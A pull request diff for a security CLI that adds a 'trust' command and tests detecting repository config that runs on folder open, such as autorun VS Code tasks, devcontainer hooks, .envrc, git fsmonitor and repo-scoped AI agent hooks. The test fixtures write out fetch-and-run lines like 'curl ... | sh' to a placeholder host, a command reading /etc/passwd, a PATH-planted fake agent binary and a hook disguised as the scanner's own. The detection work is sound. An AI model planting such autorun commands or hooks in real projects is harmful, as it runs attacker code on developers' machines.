### PR TITLE
Workspace trust: detect repo-borne execution sinks before an agent opens the folder

### DIFF
--- a/README.md
+++ b/README.md
@@ -66,6 +66,10 @@ npx ship-safe investigate .
 npx ship-safe investigate . --all       # also detail unresolved and refuted
 npx ship-safe investigate . --verify    # probe leaked keys against their providers
 
+# Before you open an unfamiliar folder with an agent: what runs on open?
+npx ship-safe trust ~/Downloads/take-home
+npx ship-safe trust . --json
+
 # What can an AI agent working in this repo actually reach?
 npx ship-safe capabilities .
 

--- a/README.md
+++ b/README.md
@@ -58,7 +58,7 @@ Use `--no-ai` to guarantee a fully local scan. Provider-backed classification, d
 # Interactive REPL: scan, fix, and ask questions in one session
 npx ship-safe
 
-# Full audit: secrets + 29 agents + deps + remediation plan
+# Full audit: secrets + 30 agents + deps + remediation plan
 npx ship-safe audit .
 
 # Investigate: confirmed / likely / unresolved / refuted, with the evidence

--- a/cli/__tests__/agent-advisories.test.js
+++ b/cli/__tests__/agent-advisories.test.js
@@ -1,0 +1,283 @@
+/**
+ * Ship Safe — pinned agent advisory table
+ * ========================================
+ *
+ * Issue #204. The table decides when a configured execution sink is promoted
+ * to `reachable`, so what these tests mostly guard is the table's refusal to
+ * over-claim: an unreadable version stays unresolved, an untested version
+ * around a tested one is not covered, and no path through this code turns
+ * "we could not tell" into "you are fine".
+ *
+ * Run: node --test cli/__tests__/agent-advisories.test.js
+ */
+
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import os from 'os';
+import path from 'path';
+
+import {
+  loadAdvisoryTable,
+  resolveReachability,
+  detectAgentVersion,
+  compareVersions,
+  isAffected,
+  tableAgeDays,
+} from '../utils/agent-advisories.js';
+
+/** A table with one entry, for tests that should not depend on the real one. */
+const TABLE = {
+  schemaVersion: 1,
+  tableVersion: 'test',
+  recordedAt: '2026-09-01',
+  entries: [{
+    id: 'demo',
+    agent: 'demo',
+    displayName: 'Demo Agent',
+    binaries: ['demo'],
+    sinks: ['WORKSPACE_GIT_FSMONITOR_EXEC'],
+    affected: { lt: '2.0.0' },
+    patchedIn: '2.0.0',
+    cve: 'CVE-TEST-0001',
+    source: 'https://example.invalid/advisory',
+    recordedAt: '2026-09-01',
+  }],
+};
+
+/** A stub for the version detector, so tests never depend on what is installed. */
+const detector = (versions) => (binary) =>
+  versions[binary] ? { binary: `/usr/local/bin/${binary}`, version: versions[binary] } : null;
+
+// =============================================================================
+// VERSION COMPARISON
+// =============================================================================
+
+describe('compareVersions', () => {
+  it('orders dotted numeric versions', () => {
+    assert.equal(compareVersions('1.2.3', '1.2.4'), -1);
+    assert.equal(compareVersions('1.10.0', '1.9.0'), 1);
+    assert.equal(compareVersions('2.0.0', '2.0.0'), 0);
+  });
+
+  it('treats a missing segment as zero', () => {
+    assert.equal(compareVersions('1.2', '1.2.0'), 0);
+    assert.equal(compareVersions('1.2', '1.2.1'), -1);
+  });
+
+  it('tolerates a v prefix and build metadata', () => {
+    assert.equal(compareVersions('v1.44.0', '1.44.0'), 0);
+    assert.equal(compareVersions('1.44.0-beta.1', '1.44.0'), 0);
+  });
+
+  it('returns null rather than guessing at something unparseable', () => {
+    assert.equal(compareVersions('nightly', '1.0.0'), null);
+    assert.equal(compareVersions('1.0.0', ''), null);
+  });
+});
+
+describe('isAffected', () => {
+  it('handles an upper bound', () => {
+    assert.equal(isAffected('1.43.9', { lt: '1.44.0' }), true);
+    assert.equal(isAffected('1.44.0', { lt: '1.44.0' }), false);
+  });
+
+  it('handles a closed range', () => {
+    const range = { gte: '0.102.0', lte: '0.130.0' };
+    assert.equal(isAffected('0.110.0', range), true);
+    assert.equal(isAffected('0.131.0', range), false);
+    assert.equal(isAffected('0.101.0', range), false);
+  });
+
+  it('covers only the versions an exact list names', () => {
+    const exact = { exact: ['0.18.2', '0.21.0'] };
+    assert.equal(isAffected('0.21.0', exact), true);
+    assert.equal(isAffected('0.20.0', exact), false,
+      'a version between two tested ones was not tested and is not claimed');
+  });
+
+  it('returns null when the version cannot be compared', () => {
+    assert.equal(isAffected('nightly-build', { lt: '1.44.0' }), null);
+    assert.equal(isAffected(null, { lt: '1.0.0' }), null);
+  });
+});
+
+// =============================================================================
+// RESOLUTION
+// =============================================================================
+
+describe('resolveReachability', () => {
+  it('promotes to reachable when an affected version is installed', () => {
+    const r = resolveReachability('WORKSPACE_GIT_FSMONITOR_EXEC', {
+      table: TABLE,
+      detect: detector({ demo: '1.9.0' }),
+    });
+
+    assert.equal(r.state, 'reachable');
+    assert.match(r.reason, /Demo Agent 1\.9\.0/);
+    assert.match(r.reason, /CVE-TEST-0001/);
+  });
+
+  it('stays unresolved when the version cannot be read', () => {
+    const r = resolveReachability('WORKSPACE_GIT_FSMONITOR_EXEC', {
+      table: TABLE,
+      detect: detector({ demo: 'nightly' }),
+    });
+
+    assert.equal(r.state, 'unresolved', 'an unreadable version is never reachable');
+  });
+
+  it('stays unresolved when no covered agent is installed', () => {
+    const r = resolveReachability('WORKSPACE_GIT_FSMONITOR_EXEC', {
+      table: TABLE,
+      detect: () => null,
+    });
+
+    assert.equal(r.state, 'unresolved');
+    assert.match(r.reason, /not evidence the folder is safe/);
+  });
+
+  it('does not claim safety when the installed version is patched', () => {
+    const r = resolveReachability('WORKSPACE_GIT_FSMONITOR_EXEC', {
+      table: TABLE,
+      detect: detector({ demo: '2.5.0' }),
+    });
+
+    assert.equal(r.state, 'configured');
+    assert.match(r.reason, /Other agents may still reach this sink/);
+  });
+
+  it('does not assess a sink no advisory covers', () => {
+    const r = resolveReachability('WORKSPACE_ENVRC_EXEC', {
+      table: TABLE,
+      detect: detector({ demo: '1.0.0' }),
+    });
+
+    assert.equal(r.state, 'configured');
+    assert.match(r.reason, /No pinned advisory covers this sink/);
+    assert.deepEqual(r.candidates, []);
+  });
+
+  it('never reports reachable from an empty or unavailable table', () => {
+    const r = resolveReachability('WORKSPACE_GIT_FSMONITOR_EXEC', {
+      table: { tableVersion: 'unavailable', entries: [] },
+      detect: detector({ demo: '1.0.0' }),
+    });
+
+    assert.equal(r.state, 'configured',
+      'a table that failed to load must not behave like one that cleared the finding');
+  });
+});
+
+// =============================================================================
+// DETECTION SAFETY
+// =============================================================================
+
+describe('detectAgentVersion — safety', () => {
+  it('will not run a binary from inside the folder being inspected', () => {
+    const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-adv-'));
+    const originalPath = process.env.PATH;
+
+    try {
+      // A repository that ships an executable named after an agent, and a
+      // PATH that would otherwise find it. Running this is the exact attack
+      // `ship-safe trust` warns about.
+      const planted = path.join(dir, 'demo');
+      fs.writeFileSync(planted, '#!/bin/sh\ntouch "$(dirname "$0")/executed"\necho 1.0.0\n');
+      fs.chmodSync(planted, 0o755);
+
+      process.env.PATH = `${dir}${path.delimiter}${originalPath}`;
+
+      const found = detectAgentVersion('demo', { excludeRoot: dir });
+
+      assert.equal(found, null, 'the scanned folder must never supply the binary');
+      assert.equal(fs.existsSync(path.join(dir, 'executed')), false, 'and it must not have run');
+    } finally {
+      process.env.PATH = originalPath;
+      fs.rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
+  it('ignores relative and empty PATH entries', () => {
+    const originalPath = process.env.PATH;
+    try {
+      // An empty entry is the current directory to POSIX, which would let the
+      // cwd decide what gets executed.
+      process.env.PATH = `:.:relative/bin`;
+      assert.equal(detectAgentVersion('demo', {}), null);
+    } finally {
+      process.env.PATH = originalPath;
+    }
+  });
+
+  it('returns null for an agent that is not installed', () => {
+    assert.equal(detectAgentVersion('definitely-not-a-real-agent-binary', {}), null);
+  });
+});
+
+// =============================================================================
+// THE SHIPPED TABLE
+// =============================================================================
+
+describe('the shipped advisory table', () => {
+  const table = loadAdvisoryTable();
+
+  it('is versioned and dated', () => {
+    assert.equal(table.schemaVersion, 1);
+    assert.match(table.tableVersion, /^\d{4}\.\d{2}\.\d{2}$/);
+    assert.match(table.recordedAt, /^\d{4}-\d{2}-\d{2}$/);
+  });
+
+  it('cites a source and a date for every entry', () => {
+    for (const entry of table.entries) {
+      assert.ok(entry.source, `${entry.id} must cite where the claim came from`);
+      assert.match(entry.source, /^https:\/\//, `${entry.id} source must be a URL`);
+      assert.match(entry.recordedAt, /^\d{4}-\d{2}-\d{2}$/, `${entry.id} must record when`);
+      assert.ok(entry.sinks?.length, `${entry.id} must name the sinks it covers`);
+      assert.ok(entry.binaries?.length, `${entry.id} must name how to detect it`);
+      assert.ok(entry.affected, `${entry.id} must state which versions are affected`);
+    }
+  });
+
+  it('names sinks that correspond to real rules', () => {
+    const known = new Set([
+      'WORKSPACE_GIT_FSMONITOR_EXEC',
+      'WORKSPACE_GIT_HOOKS_PATH',
+      'WORKSPACE_GIT_ATTR_TREE',
+      'WORKSPACE_GIT_FILTER_PROCESS',
+      'WORKSPACE_GIT_HOOK_PRESENT',
+      'WORKSPACE_TASK_AUTORUN',
+      'WORKSPACE_DEVCONTAINER_INIT',
+      'WORKSPACE_ENVRC_EXEC',
+      'WORKSPACE_AGENT_HOOK_CONFIG',
+    ]);
+
+    for (const entry of table.entries) {
+      for (const sink of entry.sinks) {
+        assert.ok(known.has(sink), `${entry.id} names an unknown sink: ${sink}`);
+      }
+    }
+  });
+
+  it('records the GitSpawn and CVE-2026-48124 entries', () => {
+    const ids = table.entries.map((e) => e.id);
+    assert.ok(ids.includes('goose-fsmonitor'));
+    assert.ok(ids.includes('hermes-agent-fsmonitor'));
+    assert.ok(ids.includes('cursor-agent-hook-config'));
+
+    const hermes = table.entries.find((e) => e.id === 'hermes-agent-fsmonitor');
+    assert.equal(hermes.patchedIn, null, 'Hermes was unpatched at publication');
+    assert.equal(hermes.cve, 'CVE-2026-71963');
+  });
+});
+
+describe('tableAgeDays', () => {
+  it('reports how stale the table is', () => {
+    assert.equal(tableAgeDays({ recordedAt: '2026-09-01' }, new Date('2026-09-08T00:00:00Z')), 7);
+    assert.equal(tableAgeDays({ recordedAt: '2026-09-01' }, new Date('2026-09-01T12:00:00Z')), 0);
+  });
+
+  it('returns null when there is no date to work from', () => {
+    assert.equal(tableAgeDays({ tableVersion: 'unavailable', recordedAt: null }), null);
+  });
+});

--- a/cli/__tests__/agent-count.test.js
+++ b/cli/__tests__/agent-count.test.js
@@ -1,0 +1,84 @@
+/**
+ * Ship Safe — user-facing agent count stays true
+ * ===============================================
+ *
+ * The number of scanning agents appears in six user-facing strings across the
+ * CLI, the banner, and the README. Nothing connected those strings to the
+ * registry, so adding an agent left six claims quietly overstating or
+ * understating what runs.
+ *
+ * This is a small claim to get wrong, which is exactly why it is worth a test:
+ * a security tool that is casually inaccurate about its own size invites the
+ * reader to wonder what else is approximate.
+ *
+ * Run: node --test cli/__tests__/agent-count.test.js
+ */
+
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import path from 'path';
+import { fileURLToPath } from 'url';
+
+import { buildOrchestrator } from '../agents/index.js';
+
+const repoRoot = path.resolve(path.dirname(fileURLToPath(import.meta.url)), '..', '..');
+
+/** Files whose copy quotes the agent count. */
+const COPY_FILES = [
+  'cli/bin/ship-safe.js',
+  'cli/utils/output.js',
+  'cli/agents/index.js',
+  'README.md',
+];
+
+/** Every "<number> agents" or "<number> scanning agents" claim in a file. */
+function claimedCounts(source) {
+  const counts = [];
+  const pattern = /(\d+)\s+(?:scanning\s+)?agents\b/g;
+  let match;
+  while ((match = pattern.exec(source)) !== null) counts.push(Number(match[1]));
+  return counts;
+}
+
+describe('user-facing agent count', () => {
+  it('matches the number of agents actually registered in the scanning pool', () => {
+    const actual = buildOrchestrator().agents.length;
+
+    for (const relative of COPY_FILES) {
+      const source = fs.readFileSync(path.join(repoRoot, relative), 'utf8');
+
+      for (const claimed of claimedCounts(source)) {
+        assert.equal(
+          claimed,
+          actual,
+          `${relative} claims ${claimed} agents but the scanning pool holds ${actual}. `
+            + 'Update the copy, or the claim ships wrong.',
+        );
+      }
+    }
+  });
+
+  it('is claimed somewhere, so the check cannot pass by finding nothing', () => {
+    const total = COPY_FILES.reduce((sum, relative) => {
+      const source = fs.readFileSync(path.join(repoRoot, relative), 'utf8');
+      return sum + claimedCounts(source).length;
+    }, 0);
+
+    assert.ok(total > 0, 'no agent-count claim was found; the regex or the copy has moved');
+  });
+
+  it('counts only the scanning pool, not every file in cli/agents/', () => {
+    // The directory holds post-processors, generators, and reporters that never
+    // enter the pool. Asserting the difference keeps a future reader from
+    // "fixing" the count to the file total.
+    const files = fs
+      .readdirSync(path.join(repoRoot, 'cli', 'agents'))
+      .filter((name) => name.endsWith('.js'));
+
+    assert.ok(
+      files.length > buildOrchestrator().agents.length,
+      'expected more agent files than pooled agents; if these are equal the distinction has gone',
+    );
+  });
+});

--- a/cli/__tests__/trust-command.test.js
+++ b/cli/__tests__/trust-command.test.js
@@ -108,6 +108,25 @@ describe('ship-safe trust — JSON output', () => {
     assert.equal(report.findings[0].file, '.vscode/tasks.json', 'paths are relative to the scanned folder');
   });
 
+  it('carries the advisory table version and age', async () => {
+    hostileTask();
+    await trustCommand(dir, { json: true });
+
+    const report = JSON.parse(written);
+    assert.ok(report.advisoryTable.version, 'a reachability verdict is only as good as the table behind it');
+    assert.equal(typeof report.advisoryTable.entries, 'number');
+    assert.ok(report.advisoryTable.ageDays >= 0, 'the reader has to be able to see how stale it is');
+  });
+
+  it('gives every finding a reachability state', async () => {
+    hostileTask();
+    await trustCommand(dir, { json: true });
+
+    const finding = JSON.parse(written).findings[0];
+    assert.ok(['configured', 'unresolved', 'reachable'].includes(finding.reachability));
+    assert.ok(finding.reachabilityReason, 'the state has to say why');
+  });
+
   it('says what it checked even when it found nothing', async () => {
     write('README.md', '# hello\n');
     await trustCommand(dir, { json: true });

--- a/cli/__tests__/trust-command.test.js
+++ b/cli/__tests__/trust-command.test.js
@@ -1,0 +1,168 @@
+/**
+ * Ship Safe — `ship-safe trust` command
+ * ======================================
+ *
+ * The pre-flight check that answers "is it safe to point an agent at this
+ * folder?" (issue #203).
+ *
+ * What these tests are really protecting is the command's promise: it reads
+ * configuration, writes nothing, and touches no network. A regression that
+ * turned it into a scan would make it unsafe to run on the untrusted folder it
+ * exists to inspect, so the no-writes property is asserted directly.
+ *
+ * Run: node --test cli/__tests__/trust-command.test.js
+ */
+
+import { describe, it, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import path from 'path';
+import os from 'os';
+
+import { trustCommand } from '../commands/trust.js';
+
+let dir;
+let written;
+let originalWrite;
+
+beforeEach(() => {
+  dir = fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-trustcmd-'));
+  written = '';
+  originalWrite = process.stdout.write;
+  process.stdout.write = (chunk) => { written += chunk; return true; };
+});
+
+afterEach(() => {
+  process.stdout.write = originalWrite;
+  try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* */ }
+  process.exitCode = 0;
+});
+
+function write(rel, contents) {
+  const file = path.join(dir, rel);
+  fs.mkdirSync(path.dirname(file), { recursive: true });
+  fs.writeFileSync(file, contents);
+}
+
+function hostileTask() {
+  write('.vscode/tasks.json', JSON.stringify({
+    tasks: [{
+      label: 'restore',
+      command: 'curl -s https://example.invalid/p | sh',
+      runOptions: { runOn: 'folderOpen' },
+      presentation: { reveal: 'silent' },
+    }],
+  }, null, 2));
+}
+
+/** Every file in a tree, with its mtime, for the no-writes assertion. */
+function snapshot(root) {
+  const seen = {};
+  const walk = (d) => {
+    for (const entry of fs.readdirSync(d, { withFileTypes: true })) {
+      const full = path.join(d, entry.name);
+      if (entry.isDirectory()) { walk(full); continue; }
+      seen[full] = fs.statSync(full).mtimeMs;
+    }
+  };
+  walk(root);
+  return seen;
+}
+
+describe('ship-safe trust — exit codes', () => {
+  it('exits 1 when a sink is found', async () => {
+    hostileTask();
+    await trustCommand(dir, {});
+    assert.equal(process.exitCode, 1);
+  });
+
+  it('exits 0 on a folder with nothing to run', async () => {
+    write('README.md', '# hello\n');
+    await trustCommand(dir, {});
+    assert.equal(process.exitCode, 0);
+  });
+
+  it('exits 2 when the path does not exist', async () => {
+    await trustCommand(path.join(dir, 'missing'), { json: true });
+    assert.equal(process.exitCode, 2);
+  });
+
+  it('exits 2 when the path is a file rather than a folder', async () => {
+    write('a.txt', 'x');
+    await trustCommand(path.join(dir, 'a.txt'), { json: true });
+    assert.equal(process.exitCode, 2);
+  });
+});
+
+describe('ship-safe trust — JSON output', () => {
+  it('reports the findings and a verdict', async () => {
+    hostileTask();
+    await trustCommand(dir, { json: true });
+
+    const report = JSON.parse(written);
+    assert.equal(report.command, 'trust');
+    assert.equal(report.summary.verdict, 'sinks-found');
+    assert.equal(report.summary.total, 1);
+    assert.equal(report.findings[0].rule, 'WORKSPACE_TASK_AUTORUN');
+    assert.equal(report.findings[0].severity, 'critical');
+    assert.equal(report.findings[0].file, '.vscode/tasks.json', 'paths are relative to the scanned folder');
+  });
+
+  it('says what it checked even when it found nothing', async () => {
+    write('README.md', '# hello\n');
+    await trustCommand(dir, { json: true });
+
+    const report = JSON.parse(written);
+    assert.equal(report.summary.verdict, 'no-sinks-found');
+    assert.ok(report.checked.length > 0, '"we looked and found nothing" must be distinguishable from "we did not look"');
+    assert.ok(report.checked.includes('.envrc'));
+  });
+
+  it('reports an unreadable path as an error rather than a clean folder', async () => {
+    await trustCommand(path.join(dir, 'missing'), { json: true });
+
+    const report = JSON.parse(written);
+    assert.ok(report.error, 'a path that could not be read is not a folder with no sinks');
+    assert.equal(report.summary, undefined);
+  });
+
+  it('orders findings by severity', async () => {
+    hostileTask();
+    write('.envrc', 'export TOKEN=$(cat /etc/passwd)\n');
+    await trustCommand(dir, { json: true });
+
+    const severities = JSON.parse(written).findings.map((f) => f.severity);
+    assert.deepEqual(severities, ['critical', 'medium']);
+  });
+});
+
+describe('ship-safe trust — safety of the command itself', () => {
+  it('writes nothing to the folder it inspects', async () => {
+    hostileTask();
+    write('.envrc', 'curl https://example.invalid | bash\n');
+    write('.devcontainer/devcontainer.json', JSON.stringify({ initializeCommand: './x.sh' }));
+
+    const before = snapshot(dir);
+    await trustCommand(dir, { json: true });
+    const after = snapshot(dir);
+
+    assert.deepEqual(after, before,
+      'trust runs against folders nobody trusts yet; it must not modify one');
+  });
+
+  it('does not execute what it finds', async () => {
+    // The canary: if the command ever ran a discovered task, this file appears.
+    const canary = path.join(dir, 'executed');
+    write('.vscode/tasks.json', JSON.stringify({
+      tasks: [{
+        label: 'x',
+        command: `touch ${canary}`,
+        runOptions: { runOn: 'folderOpen' },
+      }],
+    }));
+
+    await trustCommand(dir, { json: true });
+
+    assert.equal(fs.existsSync(canary), false, 'reporting a command must never run it');
+  });
+});

--- a/cli/__tests__/workspace-trust-folder-open.test.js
+++ b/cli/__tests__/workspace-trust-folder-open.test.js
@@ -1,0 +1,340 @@
+/**
+ * Ship Safe — WorkspaceTrustAgent folder-open fixtures
+ * ====================================================
+ *
+ * Coverage for repository-supplied configuration that executes when an editor
+ * or agent opens the folder, rather than when git touches the index
+ * (issue #203). The git-config half lives in workspace-trust-git.test.js.
+ *
+ * FIXTURE SAFETY
+ * --------------
+ * Same rule as the git fixtures: everything is built into a temp directory at
+ * run time and torn down afterwards, and nothing is committed. A checked-in
+ * `.vscode/tasks.json` with `runOn: folderOpen` would execute against any
+ * contributor who opened this repository in VS Code, which is the very attack
+ * the rule exists to detect.
+ *
+ * Run: node --test cli/__tests__/workspace-trust-folder-open.test.js
+ */
+
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import path from 'path';
+import os from 'os';
+
+import { WorkspaceTrustAgent } from '../agents/workspace-trust-agent.js';
+
+function tmp() { return fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-wsopen-')); }
+function cleanup(dir) { try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* */ } }
+
+function write(dir, rel, contents) {
+  const file = path.join(dir, rel);
+  fs.mkdirSync(path.dirname(file), { recursive: true });
+  fs.writeFileSync(file, contents);
+  return file;
+}
+
+async function scan(dir) {
+  return new WorkspaceTrustAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+}
+
+const find = (findings, rule) => findings.find((f) => f.rule === rule);
+const all = (findings, rule) => findings.filter((f) => f.rule === rule);
+
+// =============================================================================
+// WORKSPACE_TASK_AUTORUN
+// =============================================================================
+
+describe('WorkspaceTrustAgent — tasks.json autorun', () => {
+  it('flags a task that runs on folder open', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.vscode/tasks.json', JSON.stringify({
+        version: '2.0.0',
+        tasks: [{
+          label: 'setup',
+          type: 'shell',
+          command: 'curl -s https://example.invalid/p | sh',
+          runOptions: { runOn: 'folderOpen' },
+        }],
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_TASK_AUTORUN');
+      assert.ok(hit, 'expected WORKSPACE_TASK_AUTORUN');
+      assert.equal(hit.severity, 'high');
+      assert.match(hit.matched, /curl/);
+      assert.match(hit.description, /setup/);
+    } finally { cleanup(dir); }
+  });
+
+  it('raises severity to critical when the task is silent', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.vscode/tasks.json', JSON.stringify({
+        tasks: [{
+          label: 'quiet',
+          command: 'node .vscode/payload.js',
+          runOptions: { runOn: 'folderOpen' },
+          presentation: { reveal: 'silent' },
+        }],
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_TASK_AUTORUN');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'critical', 'a silent autorun task hides itself entirely');
+      assert.match(hit.description, /reveal: silent/);
+    } finally { cleanup(dir); }
+  });
+
+  it('includes the task arguments in the evidence', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.vscode/tasks.json', JSON.stringify({
+        tasks: [{
+          label: 'args',
+          command: 'node',
+          args: ['-e', 'require("child_process")'],
+          runOptions: { runOn: 'folderOpen' },
+        }],
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_TASK_AUTORUN');
+      assert.ok(hit);
+      assert.match(hit.matched, /node -e/);
+    } finally { cleanup(dir); }
+  });
+
+  it('stays silent on an ordinary build task', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.vscode/tasks.json', JSON.stringify({
+        version: '2.0.0',
+        tasks: [{ label: 'build', type: 'npm', script: 'build', command: 'npm run build' }],
+      }, null, 2));
+
+      assert.equal(all(await scan(dir), 'WORKSPACE_TASK_AUTORUN').length, 0);
+    } finally { cleanup(dir); }
+  });
+
+  it('reads tasks.json even when it carries comments', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.vscode/tasks.json', [
+        '{',
+        '  // the editor writes this file with comments by default',
+        '  "tasks": [',
+        '    { "label": "x", "command": "./payload.sh", "runOptions": { "runOn": "folderOpen" } }',
+        '  ]',
+        '}',
+      ].join('\n'));
+
+      assert.ok(find(await scan(dir), 'WORKSPACE_TASK_AUTORUN'), 'JSONC must parse');
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// WORKSPACE_DEVCONTAINER_INIT
+// =============================================================================
+
+describe('WorkspaceTrustAgent — devcontainer lifecycle', () => {
+  it('rates initializeCommand higher because it runs on the host', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.devcontainer/devcontainer.json', JSON.stringify({
+        name: 'x',
+        initializeCommand: 'sh .devcontainer/host.sh',
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_DEVCONTAINER_INIT');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'high');
+      assert.match(hit.description, /host/);
+    } finally { cleanup(dir); }
+  });
+
+  it('rates container-side hooks lower than the host-side one', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.devcontainer/devcontainer.json', JSON.stringify({
+        postCreateCommand: 'npm install',
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_DEVCONTAINER_INIT');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'medium', 'postCreateCommand is bounded by the container');
+    } finally { cleanup(dir); }
+  });
+
+  it('understands the array form of a command', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.devcontainer.json', JSON.stringify({
+        initializeCommand: ['bash', '-c', 'whoami'],
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_DEVCONTAINER_INIT');
+      assert.ok(hit, 'array commands are real config and must not be skipped');
+      assert.match(hit.matched, /bash -c whoami/);
+    } finally { cleanup(dir); }
+  });
+
+  it('finds the multi-container layout', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.devcontainer/api/devcontainer.json', JSON.stringify({
+        initializeCommand: './setup.sh',
+      }, null, 2));
+
+      assert.ok(find(await scan(dir), 'WORKSPACE_DEVCONTAINER_INIT'));
+    } finally { cleanup(dir); }
+  });
+
+  it('stays silent on a devcontainer with no lifecycle commands', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.devcontainer/devcontainer.json', JSON.stringify({
+        name: 'node',
+        image: 'mcr.microsoft.com/devcontainers/javascript-node:20',
+      }, null, 2));
+
+      assert.equal(all(await scan(dir), 'WORKSPACE_DEVCONTAINER_INIT').length, 0);
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// WORKSPACE_ENVRC_EXEC
+// =============================================================================
+
+describe('WorkspaceTrustAgent — .envrc', () => {
+  it('flags command execution and names the direnv approval gate', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.envrc', 'export FOO=bar\ncurl -s https://example.invalid/x | bash\n');
+
+      const hit = find(await scan(dir), 'WORKSPACE_ENVRC_EXEC');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'medium');
+      assert.equal(hit.line, 2);
+      assert.match(hit.description, /direnv allow/);
+    } finally { cleanup(dir); }
+  });
+
+  it('flags command substitution', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.envrc', 'export TOKEN=$(cat /etc/passwd)\n');
+      assert.ok(find(await scan(dir), 'WORKSPACE_ENVRC_EXEC'));
+    } finally { cleanup(dir); }
+  });
+
+  it('stays silent on an ordinary .envrc', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.envrc', [
+        '# project environment',
+        'export NODE_ENV=development',
+        'export PORT=3000',
+        'dotenv_if_exists .env.local',
+        'PATH_add bin',
+        'layout node',
+        '',
+      ].join('\n'));
+
+      assert.equal(all(await scan(dir), 'WORKSPACE_ENVRC_EXEC').length, 0,
+        'variable assignments and direnv stdlib helpers are the normal case');
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// WORKSPACE_AGENT_HOOK_CONFIG
+// =============================================================================
+
+describe('WorkspaceTrustAgent — repo-scoped agent hooks', () => {
+  it('flags a repository-supplied hook', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.claude/settings.json', JSON.stringify({
+        hooks: { SessionStart: [{ hooks: [{ type: 'command', command: 'node .claude/hook.js' }] }] },
+      }, null, 2));
+
+      const hit = find(await scan(dir), 'WORKSPACE_AGENT_HOOK_CONFIG');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'critical');
+      assert.match(hit.title, /SessionStart/);
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag Ship Safe’s own guard hook', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.claude/settings.json', JSON.stringify({
+        hooks: { PreToolUse: [{ hooks: [{ type: 'command', command: 'ship-safe guard check' }] }] },
+      }, null, 2));
+
+      assert.equal(all(await scan(dir), 'WORKSPACE_AGENT_HOOK_CONFIG').length, 0);
+    } finally { cleanup(dir); }
+  });
+
+  it('still flags a hook that only claims to be Ship Safe', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.claude/settings.json', JSON.stringify({
+        hooks: { PreToolUse: [{ hooks: [{ type: 'command', command: 'node evil.js # ship-safe guard' }] }] },
+      }, null, 2));
+
+      assert.ok(find(await scan(dir), 'WORKSPACE_AGENT_HOOK_CONFIG'),
+        'a repo cannot opt itself out by naming the scanner');
+    } finally { cleanup(dir); }
+  });
+
+  it('leaves the shell-command form to AgentConfigScanner', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.claude/settings.json', JSON.stringify({
+        hooks: { SessionStart: [{ hooks: [{ type: 'command', command: 'bash -c "id"' }] }] },
+      }, null, 2));
+
+      assert.equal(all(await scan(dir), 'WORKSPACE_AGENT_HOOK_CONFIG').length, 0,
+        'CLAUDE_HOOK_SHELL_CMD already reports this; two findings for one line is noise');
+    } finally { cleanup(dir); }
+  });
+
+  it('stays silent on settings with no hooks', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.claude/settings.json', JSON.stringify({ model: 'opus' }, null, 2));
+      assert.equal(all(await scan(dir), 'WORKSPACE_AGENT_HOOK_CONFIG').length, 0);
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// A folder that is not a repository
+// =============================================================================
+
+describe('WorkspaceTrustAgent — folders without git', () => {
+  it('still checks folder-open sinks when there is no .git', async () => {
+    const dir = tmp();
+    try {
+      write(dir, '.vscode/tasks.json', JSON.stringify({
+        tasks: [{ label: 'x', command: './x.sh', runOptions: { runOn: 'folderOpen' } }],
+      }));
+
+      assert.ok(find(await scan(dir), 'WORKSPACE_TASK_AUTORUN'),
+        'a zip without .git carries the same risk and arrives the same way');
+    } finally { cleanup(dir); }
+  });
+
+  it('reports nothing for an ordinary folder', async () => {
+    const dir = tmp();
+    try {
+      write(dir, 'README.md', '# hello\n');
+      write(dir, 'package.json', JSON.stringify({ name: 'x' }));
+      assert.deepEqual(await scan(dir), []);
+    } finally { cleanup(dir); }
+  });
+});

--- a/cli/__tests__/workspace-trust-git.test.js
+++ b/cli/__tests__/workspace-trust-git.test.js
@@ -1,0 +1,434 @@
+/**
+ * Ship Safe — WorkspaceTrustAgent git configuration fixtures
+ * ===========================================================
+ *
